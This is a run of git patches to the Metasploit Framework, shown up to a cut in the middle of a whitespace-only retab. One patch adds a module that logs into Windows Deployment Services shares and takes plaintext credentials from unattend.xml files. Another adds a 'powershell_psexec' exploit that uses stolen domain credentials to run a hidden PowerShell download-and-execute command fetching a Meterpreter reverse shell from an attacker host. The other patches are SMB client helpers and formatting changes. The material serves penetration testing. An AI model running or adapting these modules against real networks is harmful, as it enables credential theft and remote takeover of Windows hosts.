From edc61a19863c995d916193571ec615b74a33538e Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 31 Jan 2013 20:02:10 +0000 Subject: [PATCH 001/853] Repull --- .../windows_deployment_services_shares.rb | 236 ++++++++++++++++++ 1 file changed, 236 insertions(+) create mode 100644 modules/auxiliary/gather/windows_deployment_services_shares.rb diff --git a/modules/auxiliary/gather/windows_deployment_services_shares.rb b/modules/auxiliary/gather/windows_deployment_services_shares.rb new file mode 100644 index 0000000000..b4a5c4f48d --- /dev/null +++ b/modules/auxiliary/gather/windows_deployment_services_shares.rb @@ -0,0 +1,236 @@ +# +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex/proto/dcerpc' +require 'rex/parser/unattend' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::Remote::SMB + include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::Remote::DCERPC + + include Msf::Auxiliary::Report + include Msf::Auxiliary::Scanner + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Windows Deployment Services Unattend Gatherer', + 'Description' => %q{ + Used after discovering domain credentials with aux/scanner/dcerpc/windows_deployment_services + or if you already have domain credentials. Will attempt to connect to the RemInst share and any + Microsoft Deployment Toolkit shares (identified by comments), search for unattend files, and recover credentials. + }, + 'Author' => [ 'Ben Campbell ' ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'MSDN', 'http://technet.microsoft.com/en-us/library/cc749415(v=ws.10).aspx'], + [ 'URL', 'http://rewtdance.blogspot.co.uk/2012/11/windows-deployment-services-clear-text.html'], + ], + )) + + register_options( + [ + Opt::RPORT(445), + OptString.new('SMBDomain', [ false, "SMB Domain", '']), + ], self.class) + + deregister_options('RHOST', 'CHOST', 'CPORT', 'SSL', 'SSLVersion') + end + + + def share_type(val) + stypes = [ + 'DISK', + 'PRINTER', + 'DEVICE', + 'IPC', + 'SPECIAL', + 'TEMPORARY' + ] + + if val > (stypes.length - 1) + return 'UNKNOWN' + end + + stypes[val] + end + + # Stolen from enumshares - Tried refactoring into simple client, but the two methods need to go in EXPLOIT::SMB and EXPLOIT::DCERPC + # and then the lanman method calls the RPC method. Suggestions where to refactor to welcomed! + def srvsvc_netshareenum + simple.connect("IPC$") + handle = dcerpc_handle('4b324fc8-1670-01d3-1278-5a47bf6ee188', '3.0', 'ncacn_np', ["\\srvsvc"]) + begin + dcerpc_bind(handle) + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + print_error("#{rhost} : #{e.message}") + return + end + + stubdata = + NDR.uwstring("\\\\#{rhost}") + + NDR.long(1) #level + + ref_id = stubdata[0,4].unpack("V")[0] + ctr = [1, ref_id + 4 , 0, 0].pack("VVVV") + + stubdata << ctr + stubdata << NDR.align(ctr) + stubdata << ["FFFFFFFF"].pack("H*") + stubdata << [ref_id + 8, 0].pack("VV") + response = dcerpc.call(0x0f, stubdata) + res = response.dup + win_error = res.slice!(-4, 4).unpack("V")[0] + if win_error != 0 + raise "DCE/RPC error : Win_error = #{win_error + 0}" + end + #remove some uneeded data + res.slice!(0,12) # level, CTR header, Reference ID of CTR + share_count = res.slice!(0, 4).unpack("V")[0] + res.slice!(0,4) # Reference ID of CTR1 + share_max_count = res.slice!(0, 4).unpack("V")[0] + + raise "Dce/RPC error : Unknow situation encountered count != count max (#{share_count}/#{share_max_count})" if share_max_count != share_count + + types = res.slice!(0, share_count * 12).scan(/.{12}/n).map{|a| a[4,2].unpack("v")[0]} # RerenceID / Type / ReferenceID of Comment + + share_count.times do |t| + length, offset, max_length = res.slice!(0, 12).unpack("VVV") + raise "Dce/RPC error : Unknow situation encountered offset != 0 (#{offset})" if offset != 0 + raise "Dce/RPC error : Unknow situation encountered length !=max_length (#{length}/#{max_length})" if length != max_length + name = res.slice!(0, 2 * length).gsub('\x00','') + res.slice!(0,2) if length % 2 == 1 # pad + + comment_length, comment_offset, comment_max_length = res.slice!(0, 12).unpack("VVV") + raise "Dce/RPC error : Unknow situation encountered comment_offset != 0 (#{comment_offset})" if comment_offset != 0 + if comment_length != comment_max_length + raise "Dce/RPC error : Unknow situation encountered comment_length != comment_max_length (#{comment_length}/#{comment_max_length})" + end + comment = res.slice!(0, 2 * comment_length).gsub('\x00','') + res.slice!(0,2) if comment_length % 2 == 1 # pad + + @shares << [ name, share_type(types[t]), comment] + end + end + + def run_host(ip) + + @shares = [] + deploy_shares = [] + + begin + connect + smb_login + srvsvc_netshareenum + + @shares.each do |share| + # I hate unicode, couldn't find any other way to get these to compare! + # look at iconv for 1.8/1.9 compatability? + if (share[0].unpack('H*') == "REMINST\x00".encode('utf-16LE').unpack('H*')) || + (share[2].unpack('H*') == "MDT Deployment Share\x00".encode('utf-16LE').unpack('H*')) + + print_status("#{ip}:#{rport} #{share[0]} - #{share[1]} - #{share[2]}") + deploy_shares << share[0] + end + end + + deploy_shares.each do |deploy_share| + query_share(ip, deploy_share) + end + + rescue ::Interrupt + raise $! + end + end + + def query_share(rhost, deploy_share) + share_path = "\\\\#{rhost}\\#{deploy_share}" + print_status("Enumerating #{share_path}") + table = Rex::Ui::Text::Table.new({ + 'Header' => share_path, + 'Indent' => 1, + 'Columns' => ['Path', 'Type', 'Domain', 'Username', 'Password'] + }) + + creds_found = false + + # ruby 1.8 compat? + share = deploy_share.force_encoding('utf-16LE').encode('ASCII-8BIT').strip + + begin + simple.connect(share) + rescue ::Exception => e + print_error("#{share_path} - #{e}") + return + end + + results = simple.client.file_search("\\", /unattend.xml$/i, 10) + + results.each do |file_path| + file = simple.open(file_path, 'o').read() + + unless file.nil? + loot_unattend(file) + + creds = parse_client_unattend(file) + creds.each do |cred| + unless cred.empty? + unless cred['username'].nil? || cred['password'].nil? + print_good("Retrived #{cred['type']} credentials from #{file_path}") + creds_found = true + domain = "" + domain = cred['domain'] if cred['domain'] + report_creds(domain, cred['username'], cred['password']) + table << [file_path, cred['type'], domain, cred['username'], cred['password']] + end + end + end + end + end + + if creds_found + print_line + table.print + print_line + else + print_error("No Unattend files found.") + end + end + + def parse_client_unattend(data) + begin + xml = REXML::Document.new(data) + + rescue REXML::ParseException => e + print_error("Invalid XML format") + vprint_line(e.message) + end + + return Rex::Parser::Unattend.parse(xml).flatten + end + + def loot_unattend(data) + return if data.empty? + p = store_loot('windows.unattend.raw', 'text/plain', rhost, data, "Windows Deployment Services") + print_status("Raw version saved as: #{p}") + end + + def report_creds(domain, user, pass) + report_auth_info( + :host => rhost, + :port => 445, + :sname => 'smb', + :proto => 'tcp', + :source_id => nil, + :source_type => "aux", + :user => "#{domain}\\#{user}", + :pass => pass) + end +end From 1e60817ec9d4a32285ad2c44c8d70d7a65e3c5d4 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 31 Jan 2013 20:07:48 +0000 Subject: [PATCH 002/853] Remember the SMB Changes --- lib/rex/proto/smb/client.rb | 39 ++++++++++++++++++++++++++++++++-- lib/rex/proto/smb/constants.rb | 19 ++++++++++++++++- 2 files changed, 55 insertions(+), 3 deletions(-) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index bec1ff50d5..b16d4c666b 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1046,7 +1046,6 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils pkt = CONST::SMB_TREE_CONN_PKT.make_struct self.smb_defaults(pkt['Payload']['SMB']) - pkt['Payload']['SMB'].v['TreeID'] = 0 pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TREE_CONNECT_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 @@ -1899,7 +1898,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils resp = find_next(last_search_id, last_offset, last_filename) search_next = 1 # Flip bit so response params will parse correctly end - end until eos != 0 or last_offset == 0 + end until eos != 0 or last_offset == 0 rescue ::Exception raise $! end @@ -1921,6 +1920,42 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils return resp # Returns the FIND_NEXT2 response packet for parsing by the find_first function end + # Recursively search through directories, to a max depth, searching for filenames + # that matches regex and returns path to matching files. + def file_search(current_path, regex, depth) + depth -= 1 + if depth < 0 + return + end + + results = find_first("#{current_path}*") + files = [] + + results.each do |result| + if result[0] =~ /^(\.){1,2}$/ # Ignore . .. + next + end + + if result[1]['attr'] & CONST::SMB_EXT_FILE_ATTR_DIRECTORY > 0 + search_path = "#{current_path}#{result[0]}\\" + begin + files << file_search(search_path, regex, depth).flatten.compact + rescue Rex::Proto::SMB::Exceptions::ErrorCode => e + # Ignore permission errors + unless e.get_error(e.error_code) == 'STATUS_ACCESS_DENIED' + raise e + end + end + else + if result[0] =~ regex + files << "#{current_path}#{result[0]}" + end + end + end + + return files.flatten.compact + end + # Creates a new directory on the mounted tree def create_directory(name) files = { } diff --git a/lib/rex/proto/smb/constants.rb b/lib/rex/proto/smb/constants.rb index e03085830a..d16a564a41 100644 --- a/lib/rex/proto/smb/constants.rb +++ b/lib/rex/proto/smb/constants.rb @@ -261,11 +261,28 @@ FILE_FILE_COMPRESSION = 0x00000008 FILE_VOLUME_QUOTAS = 0x00000010 FILE_VOLUME_IS_COMPRESSED = 0x00008000 +# SMB_EXT_FILE_ATTR +# http://msdn.microsoft.com/en-us/library/ee878573(prot.20).aspx +MB_EXT_FILE_ATTR_READONLY = 0x00000001 +SMB_EXT_FILE_ATTR_HIDDEN = 0x00000002 +SMB_EXT_FILE_ATTR_SYSTEM = 0x00000004 +SMB_EXT_FILE_ATTR_DIRECTORY = 0x00000010 +SMB_EXT_FILE_ATTR_ARCHIVE = 0x00000020 +SMB_EXT_FILE_ATTR_NORMAL = 0x00000080 +SMB_EXT_FILE_ATTR_TEMPORARY = 0x00000100 +SMB_EXT_FILE_ATTR_COMPRESSED = 0x00000800 +SMB_EXT_FILE_POSIX_SEMANTICS = 0x01000000 +SMB_EXT_FILE_BACKUP_SEMANTICS = 0x02000000 +SMB_EXT_FILE_DELETE_ON_CLOSE = 0x04000000 +SMB_EXT_FILE_SEQUENTIAL_SCAN = 0x08000000 +SMB_EXT_FILE_RANDOM_ACCESS = 0x10000000 +SMB_EXT_FILE_NO_BUFFERING = 0x20000000 +SMB_EXT_FILE_WRITE_THROUGH = 0x80000000 # SMB Error Codes SMB_STATUS_SUCCESS = 0x00000000 SMB_ERROR_BUFFER_OVERFLOW = 0x80000005 -SMB_STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 +SMB_STATUS_MORE_PROCESSING_REQUIRED = 0xC0000016 SMB_STATUS_ACCESS_DENIED = 0xC0000022 SMB_STATUS_LOGON_FAILURE = 0xC000006D From 739204b86d33f90141f9ffc4530d206dcca0bc98 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Thu, 31 Jan 2013 20:17:25 +0000 Subject: [PATCH 003/853] Build upon A.Maloteaux's SMB fixes --- lib/rex/proto/smb/client.rb | 1 + 1 file changed, 1 insertion(+) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index b16d4c666b..42267652aa 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1046,6 +1046,7 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils pkt = CONST::SMB_TREE_CONN_PKT.make_struct self.smb_defaults(pkt['Payload']['SMB']) + pkt['Payload']['SMB'].v['TreeID'] = 0 pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TREE_CONNECT_ANDX pkt['Payload']['SMB'].v['Flags1'] = 0x18 From f402e00a15c55ce67edd6e72640c1ea372329b26 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 19 Jul 2013 10:04:49 -0400 Subject: [PATCH 004/853] Added powershell psexec module --- .../windows/powershell/powershell_psexec.rb | 159 ++++++++++++++++++ 1 file changed, 159 insertions(+) create mode 100644 modules/exploits/windows/powershell/powershell_psexec.rb diff --git a/modules/exploits/windows/powershell/powershell_psexec.rb b/modules/exploits/windows/powershell/powershell_psexec.rb new file mode 100644 index 0000000000..669b4505ed --- /dev/null +++ b/modules/exploits/windows/powershell/powershell_psexec.rb @@ -0,0 +1,159 @@ +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ManualRanking + + include Msf::Exploit::Remote::DCERPC + include Msf::Exploit::Remote::SMB::Psexec + include Msf::Exploit::Remote::SMB::Authenticated + include Msf::Exploit::EXE + include Msf::Exploit::Remote::HttpServer + + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Microsoft Authenticated User Powershell PSEXEC', + 'Description' => %q{ + This module uses a valid windows user account to pull a meterpreter payload via psexec (thanks to hdm and r3dy) and powershell. It then + executes it within a powershell process. This module uses a slightly modified technique that was first detailed by + @obscuresec using Powersploit. A custom payload option is avaliable via the LPATH variable. + }, + 'Author' => + [ + 'Andrew Smith "jakx" ', + ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision: 15627 $', + 'Privileged' => true, + 'DefaultOptions' => + { + 'WfsDelay' => 15, + 'EXITFUNC' => 'process', + 'Payload' => 'windows/meterpreter/reverse_tcp' + }, + 'References' => + [ + [ 'URL', 'http://obscuresecurity.blogspot.com/2013/03/powersploit-metasploit-shells.html' ], + [ 'URL', 'https://github.com/mattifestation/PowerSploit' ] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true, + 'StackAdjustment' => -3500 + }, + 'Platform' => 'win', + 'Targets' => + [ + [ 'Automatic', { } ], + ], + 'DefaultTarget' => 0, + )) + + register_options( + [ + OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]), + OptString.new('LHOST', [ true, "Host serving meterpreter payload", '' ]), + OptString.new('ARCH', [ true, "Architecture of target host (x64 or x86)", 'x64' ]), + OptString.new('LPATH', [ false, "Set this variable to the path of a local file if you want to specify a custom payload, such as powersploit", "" ]) + ], self.class ) + + end + + def peer + + return "#{rhost}:#{rport}" + + end + + def exploit + start_service( + {'Uri' => { + 'Proc' => Proc.new { |cli, req| + on_request_uri(cli, req) + }, + 'Path' => resource_uri + }}) + + + print_status("Connecting to the server...") + connect() + + #Authenticate to target machine + print_status("Authenticating to #{smbhost} as user '#{splitname(datastore['SMBUser'])}'...") + smb_login() + + if (not simple.client.auth_user) + print_line(" ") + print_error( + "FAILED! The remote host has only provided us with Guest privileges. " + + "Please make sure that the correct username and password have been provided. " + + "Windows XP systems that are not part of a domain will only provide Guest privileges " + + "to network logins by default." + ) + print_line(" ") + disconnect + return + end + + resource=get_resource[1..-1] + payload="#{resource}" + + #Determine if LPATH or MSF payload needs to be used + if (datastore['LPATH'] == "") + print_status("No custom payload specified, using metasploit payload") + elsif File.exists?("#{datastore['LPATH']}") + print_status("Good, your custom payload exists, using #{datastore['LPATH']}") + else + print_error("Specified file #{datastore['LPATH']} does not exist...exiting...") + return + end + + #Define x64 and x32 specific commands + print_status("Pulling payload from #{datastore['LHOST']} and executing..") + + cmd="cmd.exe /c powershell.exe start-process powershell.exe -Argument '-windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted " << + "-command \"iex ((new-object net.webclient).DownloadString(''http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{payload}''))\"'" + + cmd64="cmd.exe /c powershell.exe start-process \"$env:WINDIR\\syswow64\\windowspowershell\\v1.0\\powershell.exe\" " << + "-Argument '-windowstyle hidden -noexit -NoProfile -ExecutionPolicy unrestricted " << + "-command \"iex ((new-object net.webclient).DownloadString(''http://#{datastore['LHOST']}:#{datastore['SRVPORT']}/#{payload}''))\"'" + + begin + if (datastore['ARCH'] == "x86") + result=psexec(cmd) + elsif (datastore['ARCH'] == "x64") + result2=psexec(cmd64) + else + print_error("You did not specify a valid target machine architecture!") + return + end + + if (result) + print_status("x86 architecture command sent. Waiting for session...") + end + if (result2) + print_status("x64 architecture command sent. Waiting for session...") + end + rescue Rex::Proto::SMB::Exceptions::Error => exec_error + print_error("#{peer} - Unable to execute command: #{exec_error}") + return + end + + #Give time for payload to execute + select(nil, nil, nil, 25) + + handler + disconnect + end + + def on_request_uri(cli, request) + print_status("handling request for #{request.uri}") + if (datastore['LPATH'] != "") + script = File.read("#{datastore['LPATH']}") + else + script = Msf::Util::EXE.to_win32pe_psh(framework,payload.encoded) + end + send_response(cli, script, { 'Content-Type' => 'text/plain' }) + end +end From ba45e4e60cfadc434175f3ae694d3f33e77100f2 Mon Sep 17 00:00:00 2001 From: jakxx Date: Fri, 19 Jul 2013 11:09:48 -0400 Subject: [PATCH 005/853] Removed Revision --- modules/exploits/windows/powershell/powershell_psexec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/powershell/powershell_psexec.rb b/modules/exploits/windows/powershell/powershell_psexec.rb index 669b4505ed..04e378296b 100644 --- a/modules/exploits/windows/powershell/powershell_psexec.rb +++ b/modules/exploits/windows/powershell/powershell_psexec.rb @@ -23,7 +23,7 @@ class Metasploit3 < Msf::Exploit::Remote 'Andrew Smith "jakx" ', ], 'License' => MSF_LICENSE, - 'Version' => '$Revision: 15627 $', + 'Version' => '$$', 'Privileged' => true, 'DefaultOptions' => { From 6b64819ddce991b90617e3843dd9bbd6c66b3c4c Mon Sep 17 00:00:00 2001 From: jakxx Date: Thu, 25 Jul 2013 16:50:21 -0400 Subject: [PATCH 006/853] Updated Description --- modules/exploits/windows/powershell/powershell_psexec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/windows/powershell/powershell_psexec.rb b/modules/exploits/windows/powershell/powershell_psexec.rb index 04e378296b..6f13facd90 100644 --- a/modules/exploits/windows/powershell/powershell_psexec.rb +++ b/modules/exploits/windows/powershell/powershell_psexec.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('SHARE', [ true, "The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share", 'ADMIN$' ]), OptString.new('LHOST', [ true, "Host serving meterpreter payload", '' ]), - OptString.new('ARCH', [ true, "Architecture of target host (x64 or x86)", 'x64' ]), + OptString.new('ARCH', [ true, "Architecture of target host (x64 or x86). This options forces 32-bit powershell if machine is 64-bit", 'x64' ]), OptString.new('LPATH', [ false, "Set this variable to the path of a local file if you want to specify a custom payload, such as powersploit", "" ]) ], self.class ) From 785c2eeb95b0f906d50c1f95296dacf9a403d3ec Mon Sep 17 00:00:00 2001 From: Tab Assassin Date: Thu, 5 Sep 2013 16:20:04 -0500 Subject: [PATCH 007/853] Retab changes for PR #1421 --- lib/rex/proto/smb/client.rb | 492 +++++++++--------- .../windows_deployment_services_shares.rb | 368 ++++++------- 2 files changed, 430 insertions(+), 430 deletions(-) diff --git a/lib/rex/proto/smb/client.rb b/lib/rex/proto/smb/client.rb index a4221f0c84..fc50c54c85 100644 --- a/lib/rex/proto/smb/client.rb +++ b/lib/rex/proto/smb/client.rb @@ -1673,296 +1673,296 @@ NTLM_UTILS = Rex::Proto::NTLM::Utils # Perform a nttransaction request using the specified subcommand, parameters, and data def nttrans_secondary(param = '', body = '', do_recv = true) - data = param + body + data = param + body - pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct - self.smb_defaults(pkt['Payload']['SMB']) + pkt = CONST::SMB_NTTRANS_SECONDARY_PKT.make_struct + self.smb_defaults(pkt['Payload']['SMB']) - base_offset = pkt.to_s.length - 4 - param_offset = base_offset - data_offset = param_offset + param.length + base_offset = pkt.to_s.length - 4 + param_offset = base_offset + data_offset = param_offset + param.length - pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY - pkt['Payload']['SMB'].v['Flags1'] = 0x18 - if self.require_signing - #ascii - pkt['Payload']['SMB'].v['Flags2'] = 0x2807 - else - #ascii - pkt['Payload']['SMB'].v['Flags2'] = 0x2801 - end + pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_TRANSACT_SECONDARY + pkt['Payload']['SMB'].v['Flags1'] = 0x18 + if self.require_signing + #ascii + pkt['Payload']['SMB'].v['Flags2'] = 0x2807 + else + #ascii + pkt['Payload']['SMB'].v['Flags2'] = 0x2801 + end - pkt['Payload']['SMB'].v['WordCount'] = 18 + pkt['Payload']['SMB'].v['WordCount'] = 18 - pkt['Payload'].v['ParamCountTotal'] = param.length - pkt['Payload'].v['DataCountTotal'] = body.length - pkt['Payload'].v['ParamCount'] = param.length - pkt['Payload'].v['ParamOffset'] = param_offset - pkt['Payload'].v['DataCount'] = body.length - pkt['Payload'].v['DataOffset'] = data_offset + pkt['Payload'].v['ParamCountTotal'] = param.length + pkt['Payload'].v['DataCountTotal'] = body.length + pkt['Payload'].v['ParamCount'] = param.length + pkt['Payload'].v['ParamOffset'] = param_offset + pkt['Payload'].v['DataCount'] = body.length + pkt['Payload'].v['DataOffset'] = data_offset - pkt['Payload'].v['Payload'] = data + pkt['Payload'].v['Payload'] = data - ret = self.smb_send(pkt.to_s) - return ret if not do_recv + ret = self.smb_send(pkt.to_s) + return ret if not do_recv - ack = self.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY) - return ack - end + ack = self.smb_recv_parse(CONST::SMB_COM_NT_TRANSACT_SECONDARY) + return ack + end - def queryfs(level) - parm = [level].pack('v') + def queryfs(level) + parm = [level].pack('v') - begin - resp = trans2(CONST::TRANS2_QUERY_FS_INFO, parm, '') + begin + resp = trans2(CONST::TRANS2_QUERY_FS_INFO, parm, '') - pcnt = resp['Payload'].v['ParamCount'] - dcnt = resp['Payload'].v['DataCount'] - poff = resp['Payload'].v['ParamOffset'] - doff = resp['Payload'].v['DataOffset'] + pcnt = resp['Payload'].v['ParamCount'] + dcnt = resp['Payload'].v['DataCount'] + poff = resp['Payload'].v['ParamOffset'] + doff = resp['Payload'].v['DataOffset'] - # Get the raw packet bytes - resp_rpkt = resp.to_s + # Get the raw packet bytes + resp_rpkt = resp.to_s - # Remove the NetBIOS header - resp_rpkt.slice!(0, 4) + # Remove the NetBIOS header + resp_rpkt.slice!(0, 4) - resp_parm = resp_rpkt[poff, pcnt] - resp_data = resp_rpkt[doff, dcnt] - return resp_data + resp_parm = resp_rpkt[poff, pcnt] + resp_data = resp_rpkt[doff, dcnt] + return resp_data - rescue ::Exception - raise $! - end - end + rescue ::Exception + raise $! + end + end - def symlink(src,dst) - parm = [513, 0x00000000].pack('vV') + src + "\x00" + def symlink(src,dst) + parm = [513, 0x00000000].pack('vV') + src + "\x00" - begin - resp = trans2(CONST::TRANS2_SET_PATH_INFO, parm, dst + "\x00") + begin + resp = trans2(CONST::TRANS2_SET_PATH_INFO, parm, dst + "\x00") - pcnt = resp['Payload'].v['ParamCount'] - dcnt = resp['Payload'].v['DataCount'] - poff = resp['Payload'].v['ParamOffset'] - doff = resp['Payload'].v['DataOffset'] + pcnt = resp['Payload'].v['ParamCount'] + dcnt = resp['Payload'].v['DataCount'] + poff = resp['Payload'].v['ParamOffset'] + doff = resp['Payload'].v['DataOffset'] - # Get the raw packet bytes - resp_rpkt = resp.to_s + # Get the raw packet bytes + resp_rpkt = resp.to_s - # Remove the NetBIOS header - resp_rpkt.slice!(0, 4) + # Remove the NetBIOS header + resp_rpkt.slice!(0, 4) - resp_parm = resp_rpkt[poff, pcnt] - resp_data = resp_rpkt[doff, dcnt] - return resp_data + resp_parm = resp_rpkt[poff, pcnt] + resp_data = resp_rpkt[doff, dcnt] + return resp_data - rescue ::Exception - raise $! - end - end + rescue ::Exception + raise $! + end + end - # Obtains allocation information on the mounted tree - def queryfs_info_allocation - data = queryfs(CONST::SMB_INFO_ALLOCATION) - head = %w{fs_id sectors_per_unit unit_total units_available bytes_per_sector} - vals = data.unpack('VVVVv') - info = { } - head.each_index {|i| info[head[i]]=vals[i]} - return info - end + # Obtains allocation information on the mounted tree + def queryfs_info_allocation + data = queryfs(CONST::SMB_INFO_ALLOCATION) + head = %w{fs_id sectors_per_unit unit_total units_available bytes_per_sector} + vals = data.unpack('VVVVv') + info = { } + head.each_index {|i| info[head[i]]=vals[i]} + return info + end - # Obtains volume information on the mounted tree - def queryfs_info_volume - data = queryfs(CONST::SMB_INFO_VOLUME) - vals = data.unpack('VCA*') - return { - 'serial' => vals[0], - 'label' => vals[2][0,vals[1]].gsub("\x00", '') - } - end + # Obtains volume information on the mounted tree + def queryfs_info_volume + data = queryfs(CONST::SMB_INFO_VOLUME) + vals = data.unpack('VCA*') + return { + 'serial' => vals[0], + 'label' => vals[2][0,vals[1]].gsub("\x00", '') + } + end - # Obtains file system volume information on the mounted tree - def queryfs_fs_volume - data = queryfs(CONST::SMB_QUERY_FS_VOLUME_INFO) - vals = data.unpack('VVVVCCA*') - return { - 'create_time' => (vals[1] << 32) + vals[0], - 'serial' => vals[2], - 'label' => vals[6][0,vals[3]].gsub("\x00", '') - } - end + # Obtains file system volume information on the mounted tree + def queryfs_fs_volume + data = queryfs(CONST::SMB_QUERY_FS_VOLUME_INFO) + vals = data.unpack('VVVVCCA*') + return { + 'create_time' => (vals[1] << 32) + vals[0], + 'serial' => vals[2], + 'label' => vals[6][0,vals[3]].gsub("\x00", '') + } + end - # Obtains file system size information on the mounted tree - def queryfs_fs_size - data = queryfs(CONST::SMB_QUERY_FS_SIZE_INFO) - vals = data.unpack('VVVVVV') - return { - 'total_alloc_units' => (vals[1] << 32) + vals[0], - 'total_free_units' => (vals[3] << 32) + vals[2], - 'sectors_per_unit' => vals[4], - 'bytes_per_sector' => vals[5] - } - end + # Obtains file system size information on the mounted tree + def queryfs_fs_size + data = queryfs(CONST::SMB_QUERY_FS_SIZE_INFO) + vals = data.unpack('VVVVVV') + return { + 'total_alloc_units' => (vals[1] << 32) + vals[0], + 'total_free_units' => (vals[3] << 32) + vals[2], + 'sectors_per_unit' => vals[4], + 'bytes_per_sector' => vals[5] + } + end - # Obtains file system device information on the mounted tree - def queryfs_fs_device - data = queryfs(CONST::SMB_QUERY_FS_DEVICE_INFO) - vals = data.unpack('VV') - return { - 'device_type' => vals[0], - 'device_chars' => vals[1], - } - end + # Obtains file system device information on the mounted tree + def queryfs_fs_device + data = queryfs(CONST::SMB_QUERY_FS_DEVICE_INFO) + vals = data.unpack('VV') + return { + 'device_type' => vals[0], + 'device_chars' => vals[1], + } + end - # Obtains file system attribute information on the mounted tree - def queryfs_fs_attribute - data = queryfs(CONST::SMB_QUERY_FS_ATTRIBUTE_INFO) - vals = data.unpack('VVVA*') - return { - 'fs_attributes' => vals[0], - 'max_file_name' => vals[1], - 'fs_name' => vals[3][0, vals[2]].gsub("\x00", '') - } - end + # Obtains file system attribute information on the mounted tree + def queryfs_fs_attribute + data = queryfs(CONST::SMB_QUERY_FS_ATTRIBUTE_INFO) + vals = data.unpack('VVVA*') + return { + 'fs_attributes' => vals[0], + 'max_file_name' => vals[1], + 'fs_name' => vals[3][0, vals[2]].gsub("\x00", '') + } + end - # Enumerates a specific path on the mounted tree - def find_first(path) - files = { } - parm = [ - 26, # Search for ALL files - 20, # Maximum search count - 6, # Resume and Close on End of Search - 260, # Level of interest - 0, # Storage type is zero - ].pack('vvvvV') + path + "\x00" + # Enumerates a specific path on the mounted tree + def find_first(path) + files = { } + parm = [ + 26, # Search for ALL files + 20, # Maximum search count + 6, # Resume and Close on End of Search + 260, # Level of interest + 0, # Storage type is zero + ].pack('vvvvV') + path + "\x00" - begin - resp = trans2(CONST::TRANS2_FIND_FIRST2, parm, '') - search_next = 0 - begin - pcnt = resp['Payload'].v['ParamCount'] - dcnt = resp['Payload'].v['DataCount'] - poff = resp['Payload'].v['ParamOffset'] - doff = resp['Payload'].v['DataOffset'] + begin + resp = trans2(CONST::TRANS2_FIND_FIRST2, parm, '') + search_next = 0 + begin + pcnt = resp['Payload'].v['ParamCount'] + dcnt = resp['Payload'].v['DataCount'] + poff = resp['Payload'].v['ParamOffset'] + doff = resp['Payload'].v['DataOffset'] - # Get the raw packet bytes - resp_rpkt = resp.to_s + # Get the raw packet bytes + resp_rpkt = resp.to_s - # Remove the NetBIOS header - resp_rpkt.slice!(0, 4) + # Remove the NetBIOS header + resp_rpkt.slice!(0, 4) - resp_parm = resp_rpkt[poff, pcnt] - resp_data = resp_rpkt[doff, dcnt] + resp_parm = resp_rpkt[poff, pcnt] + resp_data = resp_rpkt[doff, dcnt] - if search_next == 0 - # search id, search count, end of search, error offset, last name offset - sid, scnt, eos, eoff, loff = resp_parm.unpack('v5') - else - # FINX_NEXT doesn't return a SID - scnt, eos, eoff, loff = resp_parm.unpack('v4') - end - didx = 0 - while (didx < resp_data.length) - info_buff = resp_data[didx, 70] - break if info_buff.length != 70 - info = info_buff.unpack( - 'V'+ # Next Entry Offset - 'V'+ # File Index - 'VV'+ # Time Create - 'VV'+ # Time Last Access - 'VV'+ # Time Last Write - 'VV'+ # Time Change - 'VV'+ # End of File - 'VV'+ # Allocation Size - 'V'+ # File Attributes - 'V'+ # File Name Length - 'V'+ # Extended Attr List Length - 'C'+ # Short File Name Length - 'C' # Reserved - ) - name = resp_data[didx + 70 + 24, info[15]].sub!(/\x00+$/, '') - files[name] = - { - 'type' => (info[14] & 0x10) ? 'D' : 'F', - 'attr' => info[14], - 'info' => info - } + if search_next == 0 + # search id, search count, end of search, error offset, last name offset + sid, scnt, eos, eoff, loff = resp_parm.unpack('v5') + else + # FINX_NEXT doesn't return a SID + scnt, eos, eoff, loff = resp_parm.unpack('v4') + end + didx = 0 + while (didx < resp_data.length) + info_buff = resp_data[didx, 70] + break if info_buff.length != 70 + info = info_buff.unpack( + 'V'+ # Next Entry Offset + 'V'+ # File Index + 'VV'+ # Time Create + 'VV'+ # Time Last Access + 